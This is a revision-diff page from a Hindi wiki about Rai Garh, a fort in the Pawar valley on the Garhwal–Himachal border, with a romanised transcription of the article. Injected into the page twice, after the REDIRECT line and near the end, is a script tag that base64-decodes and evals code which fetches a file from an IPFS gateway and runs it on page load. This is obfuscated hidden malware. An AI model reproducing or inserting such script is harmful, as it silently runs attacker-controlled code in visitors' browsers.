Difference between revisions of "पावर घाटी का रांई गढ़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(' ;पावर घाटी का रांई गढ़ {{main|पावर घाटी का रांई गढ़}} * गढ़व...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
+
{{main|उत्तरकाशी पर्यटन}}
;पावर घाटी का रांई गढ़
+
*पावर घाटी का रांई गढ़ गढ़वाल की अंतिम पश्चिमी सीमा का यह गढ़ [[देहरादून]] जिले के त्यूणी-शिमला मार्ग पर जुब्बल हाटकोटी देवी मंदिर के पास है। इस गढ़ का गढ़पति राणा वंश का था। इस वंश के हाटकोटी के आस-पास ढाढी व आराकोट में रहते हैं। पश्चिमी तरफ से आने वाले आक्रांताओं का सबसे पहले इसी गढ़ से पाला पड़ा था। इसलिए इसी रांई गढ़ के नाम से संपूर्ण टौंस घाटी व यमुना घाटी का नाम रवांई पड़ा। इसी गढ़ से गढ़वाल में प्रवेश होते थे। पहले जुब्बल तक गढ़वाल राज्य का हिस्सा था, बाद में राजा गढ़वाल ने इसे जुब्बल नरेश को ही दे दिया था। त्यूणी से जुब्बल के बीच आराकोट स्नैल नीराकोट का नदी के दायीं तरफ का हिस्सा उत्तरकाशी जनपद की पुरोला तहसील में आता है। आराकोट से शिमला तक सीधे सड़क परिवहन की सुविधा है। हाटकोटी में अष्ट भुजा देवी की 8 फुट ऊंची भव्य मूर्ति है। मंदिर के पास अन्य कई मंदिर व होटल हैं। हिमाचल प्रदेश सरकार ने इसे अच्छा विकसित पर्यटन स्थल बना दिया है। रांई गढ़ रमणीक जगह पर पावर नदी के किनारे है। अब यह हिमाचल प्रदेश के महासू जिले में है। एटकिशन ने आराकोट इज द गिलगिट ऑफ काश्मीर के बारे में  लिखा है।
{{main|पावर घाटी का रांई गढ़}}
 
* गढ़वाल की अंतिम पश्चिमी सीमा का यह गढ़ देहरादून जिले के त्यूणी-शिमला मार्ग पर जुब्बल हाटकोटी देवी मंदिर के पास है। इस गढ़ का गढ़पति राणा वंश का था। इस वंश के हाटकोटी के आस-पास ढाढी व आराकोट में रहते हैं। पश्चिमी तरफ से आने वाले आक्रांताओं का सबसे पहले इसी गढ़ से पाला पड़ा था। इसलिए इसी रांई गढ़ के नाम से संपूर्ण टौंस घाटी व यमुना घाटी का नाम रवांई पड़ा। इसी गढ़ से गढ़वाल में प्रवेश होते थे। पहले जुब्बल तक गढ़वाल राज्य का हिस्सा था, बाद में राजा गढ़वाल ने इसे जुब्बल नरेश को ही दे दिया था। त्यूणी से जुब्बल के बीच आराकोट स्नैल नीराकोट का नदी के दायीं तरफ का हिस्सा उत्तरकाशी जनपद की पुरोला तहसील में आता है। आराकोट से शिमला तक सीधे सड़क परिवहन की सुविधा है। हाटकोटी में अष्ट भुजा देवी की 8 फुट ऊंची भव्य मूर्ति है। मंदिर के पास अन्य कई मंदिर व होटल हैं। हिमाचल प्रदेश सरकार ने इसे अच्छा विकसित पर्यटन स्थल बना दिया है। रांई गढ़ रमणीक जगह पर पावर नदी के किनारे है। अब यह हिमाचल प्रदेश के महासू जिले में है। एटकिशन ने आराकोट इज द गिलगिट ऑफ काश्मीर के बारे में  लिखा है।
 
 
 
 
 
 
 
  
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 14:44, 17 September 2013

  1. REDIRECTsaancha:mukhy<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  • pavar ghati ka raanee gadh gadhaval ki aantim pashchimi sima ka yah gadh deharadoon jile ke tyooni-shimala marg par jubbal hatakoti devi mandir ke pas hai. is gadh ka gadhapati rana vansh ka tha. is vansh ke hatakoti ke as-pas dhadhi v arakot mean rahate haian. pashchimi taraph se ane vale akraantaoan ka sabase pahale isi gadh se pala p da tha. isalie isi raanee gadh ke nam se sanpoorn tauans ghati v yamuna ghati ka nam ravaanee p da. isi gadh se gadhaval mean pravesh hote the. pahale jubbal tak gadhaval rajy ka hissa tha, bad mean raja gadhaval ne ise jubbal naresh ko hi de diya tha. tyooni se jubbal ke bich arakot snail nirakot ka nadi ke dayian taraph ka hissa uttarakashi janapad ki purola tahasil mean ata hai. arakot se shimala tak sidhe s dak parivahan ki suvidha hai. hatakoti mean asht bhuja devi ki 8 phut ooanchi bhavy moorti hai. mandir ke pas any kee mandir v hotal haian. himachal pradesh sarakar ne ise achchha vikasit paryatan sthal bana diya hai. raanee gadh ramanik jagah par pavar nadi ke kinare hai. ab yah himachal pradesh ke mahasoo jile mean hai. etakishan ne arakot ij d gilagit aauph kashmir ke bare mean likha hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh